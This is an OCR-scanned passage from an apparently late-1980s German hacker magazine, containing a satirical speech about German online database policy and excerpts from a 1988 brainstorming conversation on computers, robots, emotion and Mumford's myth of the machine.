der kein Abgeordneter mit Online-Kenntnissen. Die Bemühungen der Bundestagsverwaltung,
ausgewählte Abgeordnete mit Online-Wissen auszustatten, dürfte daran scheitern, daß keine
Stellen bewilligt werden und daß eine Informationsversorgung nur einzelner Abgeordneter gegen
den Gleichheitsgrundsatz in der Verfassung verstößt.
Sodann soll im Regierungsviertel ein Denkmal für den unbekannten Searcher errichtet wer¬
den. Es trägt die Inschrift “LOGOFF” und gibt Besuchern ausländischer Hosts Gelegenheit,
durch eine Kranzniederlegung dem bundesdeutschen luD-Wesen ihr Mitgefühl auszudrücken.
Eine bisher im niederrheinischen Kevelar angesiedelte Devotionalienhandlung wird hier einen
Flohmarkt einrichten, in dem alte Manuals und Blue Sheets aus der jüngeren deutschen luD-
Geschichte gehandelt werden.
Schließlich ist der BMFT sich auch seiner sozialpolitischen Verantwortung bewußt und wird ein
Searcher-Genesungswerk einrichten, unter dem Namen “Carriage Return e.V.”. Hier können
nicht ruhegehaltsfähige Altsearcher eine Bleibe für den Lebensabend finden und in vertrautem
Kreise GRIPS und GOLEM miteinander spielen. Nachdem Elly Heuss-Knapp, Wilhelmine Lübke
und Hannelore Kohl bereits ähnliche karitative Aufgaben übernommen haben, konnte für die
Schirmherrschaft des Carriage Return e.V. Beatrix Riesenhuber gewonnen werden.
In seinen Bemühungen, sich frühzeitig für das Amt des FDP-Vorsitzenden zu profilieren, hat
sich Minister Möllemann mit einem weiteren starken Hoffnungsträger im Kabinett, dem Pos’tmi-
nister, verbündet; Die beiden wollen zwei Ziele miteinander verbinden - der heranwachsenden
Jugend frühzeitig Diskotheken zu vermiesen und eine hörige Btx-Kundschaft heranzuzüchten.
Zu diesem Zweck werden in Spielhallen die Flipperkästen durch Btx-Geräte ersetzt, auf denen
man im Rechnerverbund THE SOURCE und anderen Hosts online Black Jack und U-Boot-Schie-
ßen spielen kann. Um sich für dieses Geschäft sachkundig zu machen, hat Minister Schwarz-
Schilling - wie könnte es anders sein - sich auch von einem nachgeordneten Institut, dem Wis¬
senschaftlichen Institut für Kommunikationsdienste, eine Angebotsstudie durchführen lassen. So
weiß nun auch die Post endlich, daß es außer Btx noch einige andere elektronische Informations¬
dienste gibt, die in der Postwerbung bisher unberücksichtigt blieben. Diese Studie wird dem
Minister und seinem Produkt Btx freilich keine schlaflosen Nächte bereiten: Die unliebsame Kon¬
kurrenz hält er sich unschwer durch lange Lieferzeiten für Modems und DATEX-Anschlüsse
sowie durch eine Btx-orientierte Gebührenordnung vom Leib.
Frohe Botschaften kommen auch von Norbert Blüm: Er hat in den Koalitionsgesprächen eine
Lockerung des Nachtarbeitsverbots für Online-Searcher durchgesetzt, weil nachts die amerika¬
nischen Hosts bessere Responsezeiten bieten. Ferner soll Arbeitslosen durch eine längere Zah¬
lung von Überbrückungsgeld die Gründung einer selbständigen IVS erleichtert werden.
Im Bereich der Außen-, Friedens- und Sicherheitspolitik ist Außenminister Genscher der¬
zeit bemüht, eine einheitliche Haltung der Bundesregierung zu erreichen: Um die amerikanischen
Verbündeten nicht zu verärgern, strebt man eine doppelte Null-Lösung an: Die amerikanischen
Langstreckenwaffen vom Typ DIALOG und MEAD dürfen weiterhin unser Land unter ihre Fittiche
nehmen und zeigen, wo es lang geht. Als Gegenleistung wird die Bundesrepublik sich auf Kurz¬
streckendienste geringer Reichweite beschränken. STN bleibt hierbei außer Betracht, weil es den
chemischen Waffen zuzurechnen ist und strategisch von Columbus, Ohio gesteuert wird. FIZ
TECHNIK wurde vorsorglich rechtzeitig eidgenössisch neutralisiert. Das Hostpotential wird also
weitgehend eingefroren, insbesondere in qualitativer Hinsicht. Stattdessen wird im Lande kräftig
konventionell aufgerüstet.
in diesen Bestrebungen wird die Bundesregierung tatkräftig durch die Bundesländer unter¬
stützt, die aus dem Verfassungsgebot der Kulturhoheit auch eigene luD-Gestaltungsrechte her¬
leiten. Der Prototyp des Hosts mit geringer Reichweite wurde vom Freistaat Bayern in Straubing
errichtet. Über kurz oder lang wird es jedes Bundesland als Prestigeangelegenheit ansehen,
einen echten Host zu betreiben. Wo es nicht zum Großrechner reicht, behilft man sich mit
bescheideneren PC-Lösungen; auch daran kann man ja einige Jahre tüfteln. Insbesondere den
Kultusverwaltungen scheint es große Befriedigung zu verschaffen, in den Hochschulen zahl¬
reiche Minidatenbanken entstehen zu sehen und zu finanzieren, entgegen dem Grundsatz der
Wirtschaftlichkeit in der Verwaltung. Und selbst die Landwirtschaftsminister können kaum der
Versuchung widerstehen, jeweils eine eigene Wirtschaftsdatenbank aufzubauen, und zwar für
die Exportwirtschaft, in der blauäugigen Erwartung, Japaner oder Amerikaner würden darin
Geschäftskontakte suchen. Unter dem Tisch reiben sich die akquisitionsfreudigen Hard- und
Softwarehäuder die Hände, denn ihnen ist diese Art von Markt gerade recht.
So entstehen derzeit in unserem Land Hunderte von elektronischen Schrebergärten, die
sich von den traditionellen Papierdiensten nur dadurch unterscheiden, daß sie kostspieliger sind.
Ein Nutrzen wird allenfalls innerhalb der eigenen vier Wände gesucht: Hessische Datenbanken
für Hessen, niedersächsische für Niedersachsen. Gegen diese elektronische Zersiedelung unse¬
res Vaterlandes war die Aufteilung des Reiches in 16 FIZ in den 70er Jahren eine vergleichsweise
harmlose Angelegenheit.
Die Studenten in unserem Land bleiben indessen von den echten Online-Errungenschaften
weitgehend abgeschirmt. luD-Fachvorlesungen gibt es nur an einigen wenigen Plätzen. Der Nor¬
malstudent lebt weiterhin aus dem Karteikasten in der UB. Haufenweise werden jetzt Lehrstühle
für Informatik oder gar Wirtschaftsinformatik eingerichtet, kaum einer hingegen für Informations¬
praxis und -management. Die Berufenen sind Profis in Hard- und Software, aber Laien im welt¬
weiten Informationsgeschäft.
In den Behörden und Unternehmen setzt sich das Dilemma fort: Die Betriebsbuchhaltung
erfreut sich fortgeschrittener EDV-Unterstützung, wo kein Aufwand gescheut wird. Der Regie¬
rungsrat oder der Bereichsleiter, der mit denselben Endgeräten Online-Dienste nutzen möchte,
muß hingegen um seine weitere Karriere fürchten. Bei der innerbetrieblichen Informationsversor¬
gung befinden wir uns noch in den frühen 70er Jahren; trotz der vielleicht 1.000 Unternehmen,
die bereits die Zeichen der Zeit erkannt haben.
Ein bemerkenswertes Beispiel für diese Art Schrebergartenelektronik zeigen auch die 70 Indu¬
strie- und Handelskammern im Lande, wenn man einmal von den IHK-Ausgliederungen OTTl,
tbr und TVA absieht; Die ansonsten eingerichteten Datenbankdienste führen überall eher ein
Schatten- und Alibidasein, als daß sie dem IHK-Auftrag der regionalen Wirtschaftsförderung
gerecht würden.
Man spart zwar nicht an festlichen Ansprachen zum technischen Fortschritt, wie gestern
abend, als die Deutsche Gruppe der Internationalen Handelskammer im Intercontinental Hanno¬
ver ein feierliches Bekenntnis zum weltweit gespeicherten Wissen ablegte, mit Abendessen zum
Preis von 100 DM entsprechend 0.3 Std. Anschlußzeit bei einem Host. Zum Cocktail durfte Chef-
Searcher Klaus Engelhardt die Gäste am Keyboard entertainen. An der Basis sieht es jedoch
anders aus: Man scheint gerade Wirtschaftsdatenbanken und ihre privaten Anbieter wie die Pest
zu fürchten, weil man meint, die Mitglieder würden sich mit ihren Informationswünschen von den
Kammern abwenden, wenn das so weiter geht.
So ringt man denn auch mit Mühen und seit Jahren um eine eigene Firmendatenbank: Die
Stammdaten sind längst gespeichert, dienen sie doch der Ausstellung der Beitragsrechnungen.
Der darauf aufbauende Herstellernachweis mit derzeit 40.000 Unternehmen kann bisher keinem
etablierten Online-Firmennachweis Konkurrenz bieten. Dieses hindert die Kammern nicht, in
ihren Mitgliedsblättern so zu tun, als ob hier erstmals eine deutsche Firmendatenbank entstehen
würde, wie es sie in der Welt noch nicht gibt, unter Verschweigung derjenigen Dienste, welche
einige ihrer Mitgliedsfirmen seit Jahren anbieten. Man feiert es als Erfolg, daß die Kammer Pforz¬
heim nun im Bestand der Kammer Bodensee-Oberschwaben recherchieren darf, ohne daß vorab
die Zustimmung der dortigen Geschäftsführung eingeholt werden; muß, was vor geraumer Zeit
noch Sitte war. Vorerst sollen auch nur Kammern das Privileg haben, im bundesweiten Kammer-
informationssystem zu recherchieren, denn nur so ist gewährleistet, daß der Mittelständler wei¬
terhin erst die Kammer bitten muß, ihn mit den gewünschten Informationen zu versorgen. Eine
Implementierung auf einem öffentiich zugänglichen Host dürfte auf absehbare keine Mehrheit fin¬
den, mögen auch einige mutige Kammern ausscheren und sich verselbständigen.
Wenn also die Kammern eine derart restriktive und eigennützige Informationspolitik betreiben,
braucht man sich nicht zu wundern, wenn der überwiegende Teil der Mittelständler seine Infor¬
mationen weiterhin bei Sprechtagen oder Jahresempfängen zu beschaffen sucht. Jedes Land
hat eben den Informationsmarkt, den es verdient.
Was hier über die Kammern gesagt wurde, gilt sinngemäß auch für die überwiegende Zahl der
Fachverbände. Auch hier kann sich das Verbandsestablishment nur schwer mit dem Gedanken
anfreunden, die Mitglieder könnten womöglich eines Tages die Verbandsinformationen nicht
mehr nötig haben. Kammern und Verbänden wird es ebenso wie den Unternehmen selbst gehen;
Wer bei der Informationsversorgung nicht alte und neue Medien zum Einsatz bringt, wird alsbald
im Dunkeln wandeln. Die Wirtschaftsverbände täten gut daran, den Unternehmen zu zeigen, wo
es lang geht, statt die guten alten Zeiten zu verteidigen. Sie könnten hier von einigen Kreditinsti¬
tuten viel lernen, die dabei sind, durch ein Angebot attraktiver Informationsdienstleistungen die
Firmenkunden näher an sich zu binden.
So wird also Außenminister Genscher noch geraume Zeit warten müssen, bis die deutsche
Wirtschaft in der internationalen Online-Informationswelt den Stellenwert einnimmt, der ihr als
führender Industrienation zukommt. Er hat freilich bei seinen diplomatischen Bemühungen um
mehr Online-Resonanz in der Welt bereits einen achtbaren Erfolg errungen: Für viele unbemerkt
hat Papst Johannes Paul II bei seiner diesjährigen Osteransprache den zahlreichen Onlinern auf
dem Petersplatz und in aller Welt den Segen “urbi, orbi et flzibus" nicht nur in allen Landesspra¬
chen erteilt, sondern auch in STAIRS: Er sprach “Frohe ADJ Ostern”. Diese frohe Botschaft
wollen wir auch heute aus dieser Frankfurter Messehalle in unserem Herzen mit nach Hause
tragen.
Die Zuversicht, daß es auch am deutschen Online-Markt nur aufwärts gehen kann, wird auch
von FIZ TECHNIK und DATASTAR geteilt. Johannes Paul II (Rom), Peter Genth (Frankfurt) und
Heinz Ochsner (DATASTAR) stimmen darin überein, daß den Onlinern die Zukunft gehört. Der
Rechner in Bern hat genügend Kapazität, um auch noch den im Aufbau befindlichen Holy Ghost
Host des Vatikans aufzunehmen, der nicht nur die Bibel online anbieten wird, sondern auch elek¬
tronische Ferntaufen, Fernhochzeiten und Fernbeerdigungen. So werden wir dort in Kürze eine
postindustrielle Kultstätte haben, die uns fortan im Glauben an den großen Durchbruch stärken
wird.
In diesem Sinne rufe ich wieder allen Online-Brüdern und -Schwestern zu;
DEUTSCHLAND LOGONl
Chaos Talks
Ausschnitte aus einem Brainstorming vom 9. 3.1988
v: Vic (Genie) - w: Wau (Wau) - p: Poetronic (Dichter)
Grippers made from a soft gel and wrapped in
a rubberlike membrane will soon give robots
the sensitivity of human hands
w: Gibson beschreibt in “Neuromantics“ kon¬
sequent die Geschichte, daß man sich am Rüc¬
kenmark einstöpselt. Wenn man sich da in eine
Datenbank reinhackt, die einem nicht zusteht,
dann ist man gehirntot. Man ist nicht über die
Tasten verbunden, sondern über den Stöpsel.
p: Öd, wenn man da nicht kompatibel ist.
w: Aber so auf der Ebene der ganzen kleinen
Computer - In der “Byte“ war vor acht Jahren
der Kleincomputer drauf, den du dir um die
Hand schnallen kannst, als Uhr. Da war auf der
Uhr zu lesen “insert disc“ und da gab’s eine
pfenniggroße Diskette zum Reinschieben. Das
auf der Titelseite, als Grafik. Aber klare Vision.
Der nächste Punkt: Der Computer zum Auf¬
klappen. Den feuert man in die Ecke, dann
entfaltet er sich, stellt die Beinchen hoch, da
entfaltet sich ein Drucker, da entfaltet sich der
Bildschirm..
p: Eine Düsentrieb-Maschine. Daniel Düsen¬
trieb baut ein Campingzelt, das so klein ist.
Wenn du an der Schnur ziehst, hast du ein
dreistöckiges Haus mit Badewanne.
w Aber auf der Ebene ’Kofferklappelemente’
und 'Ausziehen’ läßt sich wohl einiges machen,
ln dem Format eines Koffers müßte das in
absehbarer Zeit unterzubringen sein.
p- Ich denke, es wird darauf hinauslaufen; Kitt-
1er hat geschrieben “Der Computer wird den
Begriff 'Medien’ einkassieren, weil er alle Me¬
dien in sich vereinigt“. Da wird es irgendwann
nur noch ein digitales Medium geben. Es
herrscht doch eine Unzufriedenheit darüber,
daß du heutzutage die einzelnen Medien noch
getrennt hast. Man wünscht sich eine Art Zen¬
tralstation, wo du Fernseher, Radio, Video,
Audio, Rechner vollkompatibel in einem Kasten
hast. Einen Universal-Piayer.
w: Und dann soll er wie ein Hund neben dir
herrollen.
p; Gut, dann können wir gleich weiterphanta¬
sieren. Du kannst noch einen Staubsauger ein¬
bauen, das Ding kann 'Guten Tag’ sagen, und
du kannst ihm wie einer kleinen Cruise Missile
beibringen, sich in deiner Wohnung zurecht¬
zufinden.
v: Kannste nichts verdienen dran.
w: Mir geht’s momentan nur um’s Phantasie¬
ren..
p: Vic hat insofern recht, als die Krea^vität in
bestimmten Teilen schon auch vom Erwerb-
strieb gesteuert wird.
w: Aber irgendwann wird’s doch die Maschinen
geben.
v; Das ist die Frage, ob es das geben wird.
p: Nun, wenn ein Markt da ist..
v: Aber es macht sie keiner.
w: Wieso soll man sie denn nicht machen. Das
versteh ich nicht recht.
p: Kann man sie überhaupt schon machen?
Das ist die Frage.
v: Ja, man kann sie machen.
p; Dann hast du ’ne VAX im Wohnzimmer
rumfahren, sowas.
w: Ja. Mindestens. Dann lieber so’n Transpu¬
terchen Wenn sich das dann noch teleskopisch
ausfährt und so., auf derStraße hinterherfährt..
p;Solche Robotergibt’s ja schon. Aberdas sind
eher Partygags. Ich hab’ auf der Buchmesse
einen gesehen. Der war auch nochgefaked, mit
einer Videokamera drin. Da saß einer in einem
Verschlag und hat den ferngesteuert.
v; Die Videokamera war auch nurFake. DerTyp
stand daneben. Ich kenn die Dinger.
p; Meinste, man kann da schon differenziertere
Dinger bauen?
w: Also, der Atari ist die billigste Lösung..
p: Der fährt doch nicht in der Wohnung rum.
w: Das ist ja das Programm. Das Problem ist,
daß solche Sachen nicht käuflich zu erwerberi
sind, aber aus handelsüblichen Bauteilen zu¬
sammengesetzt werden können,
p: Was könnte man sich denn da vorstellen? Ich
meine, es wär schon witzig, wenn man so ein
universaldomestiziertes Haustier hätte. Soll
das alle Arbeiten, die sonst einer Hausfrau
übertragen sind, übernehmen? Soll das mehr
können? Soll das Sympathie erwecken? ich
könnt mir schon vorstellen, mich mit so einer
Maschine anzufreunden.
v: Daß man sowas im Haushalt brauchen kann
interessiert mich gar nicht. Was mich daran
vielmehr interessiert, sind die psychologischen
oder philosophischen Aspekte. Das find ioh
interessanter. Ob das Ding fährt oder nicht \t
mir völlig egal. ’
p: Dich interessiert also ein HIRN.
v: Mich interessiert nur das Hirn.
w; Das mobile Hirn.
v; Braucht nicht mobil zu sein. Das kann auch
in der Ecke liegen. Mich interessiert nur das
Hirn. Seit vielen, vielen Jahren fasziniert mich
der Gedanke der Zusammensetzung der Emo¬
tionen. Und da hab ich so ein paar verschiedene
Hypothesen hingestellt..
p: Sag mal. Ich hab auch eine Hypothese.
v; Die eine Hypothese ist, daß das eine Form
von komplexer Logik ist. Daß also Gefühl kom¬
plexe Logik ist.
w: Das ist Logik auf der Ebene der Musterer¬
kennung. Aber noch nicht erkannt.
p: Mein Konzept von Emotionen ist: Ich nehme
mal den biologischen Organismus. Jedes Or-
gan sendet dauernd eine Zustandsmeldung
aus in Form chemoelektrischer Signale, Bo¬
tenstoffe, sowas. In Form von Stofflichkeiten.
Diese Emanationen der einzelnen Körperteile
oder Organe - wenn du es ganz rationalistisch
ohne Geist und Seele siehst - ergeben das,
was man so 'emotionale Grundlage’ nennt. Das
Gefühl.
V. Mein Ansatz ist ein anderer. Ich bastel was
zusammen, was fühlt.
p: Dazu mußt du dir doch erstmal darüber klar
sein, was Gefühle sind.
v; Da ist eben die eine Hypothese, das sei eine
komplexe Logik, die gar nicht soo komplex ist,
aber komplex genug, um vom Vordergrund¬
verstand erfaßt werden zu können.
p: Nimm als Modell deine eigenen Emotionen.
v: Meinetwegen. Aber warum soll ich., ich mein,
ich hab mein Modell doch schon gefunden.
p: Ja, ’ne komplexe Logik. Aber von was..?
v: Wie - von was?
p: Wie-wie von was?
(Heiterkeit)
v: Was soll die Frage? ’Ne komplexe Logik ist
’ne komplexe Logik.
p: Logik ist ’ne Denkfunktion. ’Ne Gehirnfunk¬
tion. Keine emotionale Funktion. Ich weiß nicht,
ob das Modell übertragbar ist..
v: Naiin..! Das hat mit Mustern überhaupt nichts
zu tun. Du kommst da viel zu sehr von der
deduktiven Seite her.
p: Ich komm von der sprachlichen Seite. Die
Sprache gibt auch ein Modell von Emotionen.
v; Nein. Warum verbeißt du dich auf dieses
Scheißmodell von Emotion. Stell dir einfach mal
vor, ich will ’ne Emotion erklären.
p; Das soll ja angeblich immer wieder mal
versucht werden.
v: Gut.
p: Sie stehen auf meinem Fuß. Es tut mir weh.
So die Art, nicht?
v; Nein. Außerdem bringt das nichts, wenn du
mir dauernd zwischenredest.,
p; Ich hör schon auf.
v: ..sondern wenn ich mir überlege: Woraus
besteht Emotion? Wenn ich mir Gedanken ma¬
che darüber: Woraus könnte Emotion beste¬
hen? Dann ist mir eine Hypothese eingefallen:
Sie könnte aus Logik bestehen. Das nehmen
wir einfach mal so als Hypothese hin. So. Diese
Gesetze der Logik kann man ja normalerweise
ganz gut erfassen, mit Hilfe von Computern,
oder selber drüber nachdenken oder waswei-
ßich. Man müßte daher eigentlich von der Ein¬
gabe zur Ausgabe kommen. D.h., man müßte
diese Logik nachverfolgen können. Dadas aber
äußerst schwierig ist, kann man diese Idee
weiterspinnen und sagen: Die ist eben ein bi߬
chen komplizierter. Die kann man nicht einfach
so durchrechnen. Und - wenn ich mir jetzt die
richtigen Menschen ansehe, dann kann man
manchmal von bestimmten Eingangsparame¬
tern auf die Ausgangsparameter schließen.
p: Das heißt, wenn ich jemanden wie Kurt
Waldheim sehe und sein Gesicht sehe, dann
kann ich annehmen, daß er hinterhältig ist.
v: Naiin! Wenn ich was reintue, dann kommt
was raus. Das Verarbeitungsprogramm ist
Emotion, okay. Also: Eingabe - Emotion -
Ausgabe, das ist mal so das Modell, das grobe.
w: Wenn ich ’mal so zurückgehe, dann ist also
das jeweils gemeinsame historische Moment
das Übertragen der jeweils fortgeschrittensten
Technologie auf det Janze. Zu der Zeit, wo sie
die Uhren hatten, da war die Erfindung des
Perpetuum Mobile angesagt. Und da wurden
dann Menschen, Maschinen und Puppen, ge¬
baut, mit hervorragend natürlichen Kurvenbe¬
wegungen, mechanisch relisiert. Die sehen
echt aus. Wenn ich mir heut einen Roboter
anschau, dann ist der echt Scheiße. Da war ein
Menschenbild dahinter, das auch stark uhr¬
werkgesteuert war.
p: Hast du ’mal Mumford gelesen, “Der Mythos
der Maschine“? Es ist mir schwer vorstellbar,
wie ein einzelner Mensch in einer Lebenszeit so
viel an Gesamtwissen Zusammentragen kann,
aus sämtlichen Natur- und Geisteswissen¬
schaften und der Literatur, und das noch ver¬
arbeiten kann. Das Buch geht vom aufrechten
Gang bis zur Mondrakete, wobei er nebenbei
noch wissenschaftliche Ansichten revidiert,
z.B. daß in den Altertumswissenschaften bis¬
her viel zu gro ßes Augenmerk auf die Artefakte
gelegt worden ist, die materiellen Funde. Was
eigentlich passiert ist, ist in keiner Versteine-
rung ©nthaltsn, z.B. das Ritual. Odar rauszu¬
finden, wie man eine Kaffeebohne richtig be¬
handelt, damit sie antörnt. Wenn du Urmensch
bist stehste da vorerst im Wald. Das mußt du
erstmal rausfinden, und das ist eine gewaltige
Leistung, bedeutender als irgendwelches
Steinchenklopfen. , . . ^
Oder die Zeit. Heutzutage stehen in jedem
Zimmerdrei Digitaluhren rum. Herauszufinderi,
wie du einen Kalender machst.. Ich stell mir
manchmal vor, daß einige hunderttausend Jah¬
re lang Leute, die nachts Schwierigkeiten mit
dem Einschlafen hatten, in die Sterne geguckt
haben. Irgendwann muß jemandem aufgefal¬
len sein, daß sich da was ändert. Irgendwann
viel, viel später muß jemandem aufgefallen
seiti, daß sich da regelmäßig was ändert. Und
dann muß sich jemand gesagt haben: das wol¬
len wir doch jetzt mal festhalten.
Oder wenn du dir überlegst, was für eine Gro߬
tat die Entwicklung von einem Gefäß ist, ’nem
Krug. Dazu mußt du vorausschauen können,
das kann kein Tier. Ein Gefäß ist etwas, wo
noch nichts drin ist. Da wird erst etwas rein¬
kommen. . ^
Das Hauptthema in dem Buch ist die Maschine.
Wann ist die Maschine entstanden, der Mythos
der Maschine? Mumford sagt; Die erste Ma¬
schine ist zusammengebaut worden im alten
Ägypten, in der Pyramidenzeit. Das waren die
ersten Pyramidenbaumeister, die diese Logi¬
stik bewältigt haben und eine Maschine aus
menschlichen Teilen zusammengesetzt ha¬
ben. Diese ganze Transportproblematik, die
Bautrups, die Leute in den Steinbrüchen, die
Versorgung. Das war das erste Mal in der
Menschheitsgeschichte, die erste Maschme.
Nach und nach sind dann im Lauf der Ge¬
schichte die unzuverlässigen menschlichen
Teile der Maschine durch mechanische ersetzt
Und daß man heute - ich hab den Mumford
noch ein bißchen weiterphantasiert - daß man
heute viele Parallelen findet zum Pyramiden¬
zeitalter. Z.B. bei einem Atomkraftwerk, wie da
mit den Tricks der Bronzezeitgötter gearbeitet
wird. Der Mensch versucht, dem Sonnengott
das Werkzeug aus der Hand zu nehmen. Diese
kontrollierten Energien, die auf der Sonne vor
sich gehen, zu zähmen und zu bändigen. Daß
unsere Priesterkaste, die Wissenschaftler und
Technologen, das will.
w; In der Bibel heißt das 'Das eherne Meer’.
Beim Tempelbau des Königs Salomon. Da ist
der Guß schiefgegangen, die Zugabe von Was¬
sererfolgte nicht wie geplant. Das ganze haben
noch Gesellen versiebt, die dem Meister die
neue Braut nicht gegönnt haben, urtd da isser
dann in dieses flüssige Meer hineingetaucht
und wieder zurück. Also, flüssiges Metall von
dieserGrößenordnung.so wie ich mirdasdann
nach dieser biblischen Erzählung V9rgestellt
habe, das hatte ich so in der Birne bei Tscher¬
nobyl. Da stehen schon sehr starke Visionen
drin.
p: Das anschaulichste Bild, das Mumford ver¬
wendet, ist der Vergleich zwischen altägypti¬
schen Pyramiden und Mondraketen. Beides
sind Bauten einerGroßtechnologie. Das Innere
einer Raumkapsel ist gleichzusetzen mit der
innersten Kammer einer Pyramide, wo auch die
miniaturisierte Ausrüstung für eine Reise in die
Unendlichkeit steht. Und wenn du ’ne Mumie
und ’nen Astronauten vergleichst, fallen die
Ähnlichkeiten schon rein optisch auf. Beides
sind Menschen in einem Zustand höchstmög¬
licher Reduktion der Lebensprozesse, was not¬
wendig ist, um solche außermenschlichen Be¬
reiche zu erfahren. Ein Astronaut trainiert jah¬
relang, seine Lebensfunktionen auf größt¬
mögliche Weise zu reduzieren, um diesen Be¬
dingungen, die im Raum herrschen, entge¬
genstehen zu können.
Es gibt ja auch nix Irrationaleres als die Vor¬
stellung, auf den Mond zu fliegen. Das ist das
unwirtlichste, menschenfeindlichste., das wu ß-
te man schon vorher, daß da die Kälte ist, und
Steine.
w: Also, an der Hell-Dunkel-Grenze das Zelt
aufzu sch lagen, das fand ich schon interessant
p; Klar hat das eine gewisse Poesie. Ich mein©-
bei den Pyramiden versteht heute auch keiner
mehr, warum man die gebaut hat.
Um nochmal zurückzukommen; Was ist die
Konsequenz aus der fortschreitenden Com-
putehsierung? Die Idealvorstellung von der Vof
lautomatisierung? Es ist halt sehr die Frage, qk
wir das wollen. Einzelmedien bringen es'mit
sich, daß, wenn du z.B. fotografierst, die Be¬
reitschaft nachläßt, Bilder mit Aufmerksamkeit
wahrzunehmen und zu behalten. Wenn du
dauernd fotografierst, verlierst du dein visuelle^
Gedächtnis.
w: Medialer Analphabetismus.
p: Wenn wir nun also grob gesagt mit den
Computern den Geist nach außen verlegen,
oder das Bewußtsein, um das alles von Auto¬
maten erledigen zu lassen — daß wir vielleicht
im Endzustand ausgeleert, mild lächelnd uricj
haschischrauchend in der Ecke sitzen, und die
Rechner treiben die Kulturentwicklung voran,
ich mein’, ich hab mich schon mal gefragt, ob
das dieses Gefühl, zu leben, ist; Diese leichte.,
auch wenns einem gut geht, wenn du grade
gevögelt hast, gegessen hast und die Sonne
scheint, trotzdem dieses leichte Gefühl von
Last, von Anstrengung. Diese Anforderung, die
Kulturgeschichte der Menschheit voranzutrei¬
ben, auch wenn du nur hustest. In diesen gan¬
zen mikroskopischen Einzelheiten. Es ist sehr
die Frage, ob Rechner sowas jemals machen
können, ob selbstmodifizierende Systeme wie
die biologischen Organismen in digitaler oder
elektronischer Form möglich sind.
Und dann: Wir scheiden uns selber aus der
Entwicklungsgeschichte aus. Wir sitzen dane¬
ben und schauen, wie die Apparate sich wei¬
terentwickeln und sind froh, daß wir nichts mehr
machen müssen. Dann wird’s uns irgendwann
nicht mehr gaben. Oder wir werden ’ne Art
Parasiten der Maschinen. Was ist deine Sicht
von der Zukunft der Computerei?
w: Zugang zu Datenbanken und Wissen.
p: Aber, Alter, schaut es nicht im Augenblick
eher umgekehrt aus? Daß wir Wissen ver¬
stecken in Datenbanken, vergraben? Wissen,
das keiner mehr suchen will oder kann, ent¬
weder weil es zu teuer ist, oder zu kompliziert?
w: Es ist einfach zu teuer aus politischen Grün¬
den. Die Kommunikationspreise sind um den
Faktor 1000 überteuert.
p: Auch wenn’s nix kosten würde. Wenn du
nicht mehr weißt, was du überhaupt suchen
kannst..
w: Das Suchen wird künstlich behindert von den
Staaten. Als die Amis hier einmarschiert sind,
haben sie nicht nur das Patentamt ausgeräumt
- da sind nur noch Mikrofilme da -, sondern es
ist doch so, daß jeder Staat sein Patentwissen
so gut hütet, daß jeder Staat für sich selber ein
so absurdes Ordnungssystem hat, mit dem
man zwar leben kann, mit dem man aber nichts
finden kann.
p: Ich hab mir schon mal überlegt, das wäreine
Möglichkeit zur Arbeitsplatzbeschaffung, wenn
die einzelnen User in den Datenbanken nicht
qualvoll X Retrievalsprachen lernen müßten,
sondern du nicht mehr an eine automatische
Zutrittsmeldung kommst, sondern an einen
Portier, einen richtigen Menschen. Wie an der
Hotelrezeption. Ein Navigator.
v: Gibt’s schon.
p: Daß da einer sitzt, den du antickern kannst?
v: Nicht nureiner. Da sitzt ein ganzesTeam. Bei
"Delphi“. Die sind immer da, und wenn du
irgendwie Probleme hast, kannst du die direkt
anquatschen.
p: Ach ja, das haben die doch von vornherein
gemacht. So’n Operator.
v: Nein, das sind keine Operators. Das sind
Leute aus dem kultur- oder sprachwissen¬
schaftlichen Bereich, und wasweißich wofür.
Fachleute.
p: Die kennen sich auch mit den ganzen Re-
trievals aus?
v: Manchmal machen die auch gar kein Re-
trieval. Manchmal schlagen die ein Buch auf.
p: Man glaubt es kaum.
w: ..oder telefonieren..
v: ..oder antworten einfach so. Find ich ’ne
wirklich gute Idee. Das Orakel von Delphi ist ja
schon in der griechischen Sage nicht zu kurz
gekommen.
p: Ich hab’ unlängst wieder ein Urbild vom
Monitor in den alten Mythen gefunden. Ale¬
xander der Große hatte angeblich einen ’Wel-
tenspiegel’, durch den er auf alle sieben Kon¬
tinente gleichzeitig gucken konnte. Tolle Vision.
Und alles Tun seiner Feinde beobachten. So
’ne Art Spähsatelliten hatte der schon. Gabs
schon im Mythos. Ist schon komisch, was man
da an Bildern wiederfindet.
Kennst du das; wenn du einen Scheit Holz im
Feuer hast, diesen Scheit siehst, wenn das
Feuer schon runtergebrannt ist und der noch
glüht. Du siehst keine Flammen mehr, nur noch
dieses glühende Holz, und die Rinde springt in
kleinen Blockmustern auf. Wenn du drei Mi¬
nuten abmeditierst - das geht mir jedesmal so
-, dann siehst du exakt, auch durch diese
leichten Windflüge in der Glut, das Bild einer
nächtlichen Großstadt im 20. Jahrhundert, wie
man’s jetzt aus dem Flugzeug sehen kann.
Manchmal denke ich mir: Sind das die Dinge,
die Bilder, die die Kulturvorantreiben? Wenn da
Steinzeitmenschen vor dem Feuer gesessen
sind und das gesehen haben, und dann irgend¬
wann 5000 Jahre später ist das Bild realisiert?
w: Das beantworte ich insofern mit Ja, als: Hast
du mal die Augen eines Schmiedes gesehen?
p: Noch nicht bewußt.
w: In ihnen lebt dieses Feuer. Berufsbedingt.
Von daherauch die Rolle des Schmiedes in der
griechischen Sage. Ich mein’, es ist ja nicht nur
so, daß man dem Menschen das Feuer bringen
muß, sondern man muß ja auch was damit
machen. Einfach nur ’ne Fackel irgendwo hin¬
stellen ist ein bißchen lahmarschig. Und für
sowas wie die Bronzezeit meinetwegen be¬
durfte es eines Schmieds. Und das Gedicht von
der Glocke - also: Schmied - Kunstschmied -
Glockenschmied. Glockenschmied: Besonde¬
re Probleme, besondere Situation, weil: Ich
brauch einfach mal fünf Kilo Gold und zwölf Kilo
Silber, und wenn ich das nicht kriege, dann
klingt das halt nach Blech. Und dann sind da
ungeheure logistische Probleme zu bewälti¬
gen. Aus irgendwelchen Ruten, mit Ton zu
verschmieren und die Suppe da reinzukippen.
Ein Versuch.
p: Da gibt’s übrigens in Kairo heutzutage noch
einen schönen Beruf, und zwar gibts in den
Basaren eine Straße, da sitzen die Kupfer¬
schmiede, eine, da sitzen die Goldschmiede -
übrigens: wenn du dir da Schmuck machen
läßt, das kostet nur den Goldpreis -, und da
gibt’s einen Typen, der kommt um vier Uhr
morgens und bringt die Glut.
w: Auf dieser Produktionsebene, da kommt
davor der Köhler, und der Schmied ist einfach
all-in-one-production, die Reste sind dann al¬
les so verfeinert.. Ich denke, daß es genau
